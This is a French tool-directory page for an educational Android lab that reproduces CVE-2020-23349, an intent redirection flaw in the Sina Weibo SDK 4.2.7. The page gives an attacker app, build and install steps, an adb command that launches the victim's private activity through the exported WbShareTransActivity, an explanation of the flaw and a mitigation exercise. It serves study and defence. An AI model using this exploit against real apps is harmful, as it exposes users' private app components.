Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-23349_Lab — Laboratoire Android pédagogique pour la CVE-2020-23349 dans le SDK Sina Weibo 4.2.7 | Kitploit
Outils/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Sécurité AndroidAnalyse des VulnérabilitésExploitationPentesting d'Applications MobilesSécurité MobileApprentissage et ÉducationLabs et Pratique
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Laboratoire Android pédagogique pour la CVE-2020-23349 dans le SDK Sina Weibo 4.2.7

Voir le dépôt
il y a 11 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Laboratoire Android CVE-2020-23349

Projet pédagogique permettant de reproduire localement la vulnérabilité de redirection d'intention (Intent Redirection) du SDK Android 4.2.7 de Sina Weibo.

À utiliser uniquement sur des appareils de test autorisés ou un émulateur. Ne pas l'utiliser contre de véritables applications utilisateur.

Composition

  • victim : application vulnérable incluant le openDefault-4.2.7.aar réel
  • attacker : application attaquante qui appelle l'activité exportée WbShareTransActivity
  • victim/.../PrivateActivity : cible de la reproduction avec android:exported="false"

Le flux vulnérable est le suivant :

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

Compilation

Android SDK 36 et JDK 17 sont requis.

root@kitploit:~
./gradlew clean assembleDebug

Fichiers générés :

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

Installation et reproduction

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. Si nécessaire, exécutez l'application Victim une fois.
  2. Dans l'application Attacker, appuyez sur le bouton Launch private Activity.
  3. Si l'écran EXPLOIT SUCCESS apparaît, la reproduction a réussi.

Vous pouvez également reproduire directement avec ADB.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

Pourquoi cela fonctionne

Le SDK 4.2.7 fait confiance aux chaînes startActivity et gotoActivity de l'Intent externe et les utilise sous la forme suivante :

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

Comme this est le Context de l'application Victim, Android considère que c'est l'application Victim elle-même qui exécute sa propre activité privée.

Dans les builds Android modernes, android:exported doit être déclaré explicitement ; ce projet définit donc explicitement true dans victim/AndroidManifest.xml afin de reproduire l'état d'exportation implicite des anciens SDK.

Exercice d'atténuation

Pour les exercices qui ne nécessitent pas la fonction de partage, remplacez la valeur suivante par false et reconstruisez :

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

Ensuite, si vous répétez la même attaque, elle sera bloquée par une SecurityException. Dans un produit réel, vous devez supprimer le SDK Weibo 4.x et mettre à niveau vers la dernière version de maintenance.

Source du SDK

L'AAR inclus provient du commit 4.2.7 du dépôt public officiel de Sina Weibo.

  • Dépôt : https://github.com/sinaweibosdk/weibo_android_sdk
  • Commit : 99daf8a (4.2.7)
  • Fichier : 新文档/openDefault-4.2.7.aar
Télécharger l’outil